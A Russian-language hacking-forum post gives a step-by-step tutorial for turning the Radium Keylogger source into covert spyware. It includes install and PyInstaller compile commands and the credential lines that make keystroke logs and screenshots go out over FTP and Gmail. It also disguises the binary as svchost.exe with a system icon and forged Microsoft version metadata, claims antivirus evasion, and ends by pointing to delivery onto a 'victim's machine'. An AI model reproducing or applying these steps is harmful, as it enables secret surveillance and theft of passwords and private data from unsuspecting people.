Беспалевный кейлогер=)

Тема в разделе "Добыча | Навар | Обучение", создана пользователем mult1tabs, 27 ноя 2018.

  1. mult1tabs

    mult1tabs Новорег

    Регистрация:
    27 ноя 2018
    Сообщения:
    6
    Симпатии:
    4
    Розыгрышей:
    0
    Пол:
    Мужской
    Что нам понадобится?
    1. Гуглим название "Radium Keylogger" и качаем все с гитхаба, распаковываем в рандомную папку.
    2. Гуглим "Python2.7 скачать бесплатно без смс в высоком качестве" загружаем и устанавливаем с параметрами по умолчанию, единственное о чем хотелось бы сказать, что нужно выбрать ВСЕ компоненты для установки в окне выбора компонентов для установки соответственно. В противном случае вас ждут проблемы, не буду описывать подробностей.
    3. Так же все загружаем и устанавливаем оттуда же, со страницы Radium Keylogger на гитхабе из раздела Requirements (PyHook; PyWin32; Microsoft Visual C++ Compiler for Python) кроме PyInstaller. Его мы установим ручками в следующем шаге.
    4. Открываем PowerShell от имени администратора. Далее переходим в папку с распакованными исходниками с помощью команды
    Код:
    cd С:\полный\путь\до\ исходников
    Потом выполняем комманду
    Код:
    pip install pyinstaller
    так же следом установим рекомендованные пакеты
    Код:
    pip install -r .\requirements.txt
    5. Открываем исходник Radiumkeylogger.py в вашем любимом текстовом редакторе можете хоть в Word.
    Ищем строки
    ip = base64.b64decode("") #IP to connect to FTP server адрес или домен ФТП сервера.
    ftpkey = base64.b64decode("") #FTP password Пароль от ФТП сервера.
    ftpuser = base64.b64decode("") #FTP username Имя пользователя ФТП сервера.
    passkey = base64.b64decode("") #Password to connect to GMAIL smtp server Пароль от почты.
    userkey = base64.b64decode("") #Username to connect to GMAIL smtp server Имя пользователя.
    из названия не трудно догадаться что для чего. Но все же скажу что нужно сделать. Заменяем значения вида base64.b64decode("") на просто тупо "ваше значение". Если не лень можете сконвертировать ваши данные в кодировку base64 с помощью любого онлайн конвертера и прописать значение в кавычки между скобок.
    6. Пройдемся по исходнику и для порядка и маскировки поправим везде где упоминается "AdobePush.exe" на "svchost.exe". Так же заменим "Radiumkeylogger.py" и "AdobePush.py" на svchost.exe для обеспечения работоспособности автозагрузки.
    7. Компилируем все в исполняемый файл, в том же окне PowerShell
    выполняем команду
    Код:
    pyinstaller --onefile --windowed Radiumkeylogger.py
    Если вы все делали правильно в папке с исходниками появится пара папок. В папке dist и будет ваш долгожданный кейлогер. Весит сие чудо 9100Kb. Что очень печально для малвари должен я сказать, но ничего не поделаешь, я не стал заморачиваться ибо не для себя. Тем более, что стандартный svchost иногда и все 50Mb отжирает и если он будет весить 20Kb может вызвать подозрение у опытного пользователя.
    8. На этом еще не все, с паковкой и криптом можете сами заморочиться, мы сейчас же произведем базовую маскировку. Качаем и устанавливаем программы VerPatch и Resource Hacker. Для вашего удобства выбрал самое общедоступное.
    9. Переименовываем получившийся файл в svchost.exe. Открываем с помощью Resource Hacker библиотеку /Windows/system32/imageres.dll и сохраняем все ее ресурсы в какую либо папку, думаю с функционалом этой программы вы разобраться в состоянии. Далее открываем наш кейлогер и заменяем его иконку на 15.ico это стандартная иконка для приложений внутри которых нет ресурсов, с этой же иконкой и отображаются основные системные процессы Windows. Сохраняем и выходим.
    10. Копируем наш файл в папку с распакованным VerPatch. Открываем командную строку и переходим в эту папку. Выполняем команду
    Код:
    verpatch svchost.exe 6.3.9600.0 /va /s description "Host Process for Windows Services" /s product "Microsoft Windows"
    Если система с российской локалью замените "Host Process for Windows Services" на Хост процесс для сервисов Windows" или как там мать ее.
    После этого наш кейлогер будет палиться только тем что запущен от имени пользователя. Впрочем и эту проблему можно легко решить погуглив пару минут.
    11. Все. Можно запускать и проверять электронную почту, после запуска должно придти уведомление на электронную почту что все ОК. Хотелось бы предупредить, что логи отправляются по умолчанию после набора 300 символов скриншоты после набора 500 символов, скриншоты пакуются по 10 штук и отправляются на почту как и логи. Естественно покопавшись ручками в исходнике все значения можно заменить под ваши требования.
    он не детектится основными антивирусами лишь только какими то совсем экзотическими. Вам остается только решить вопрос доставки его на машину жертвы
     

Поделиться этой страницей

Яндекс.Метрика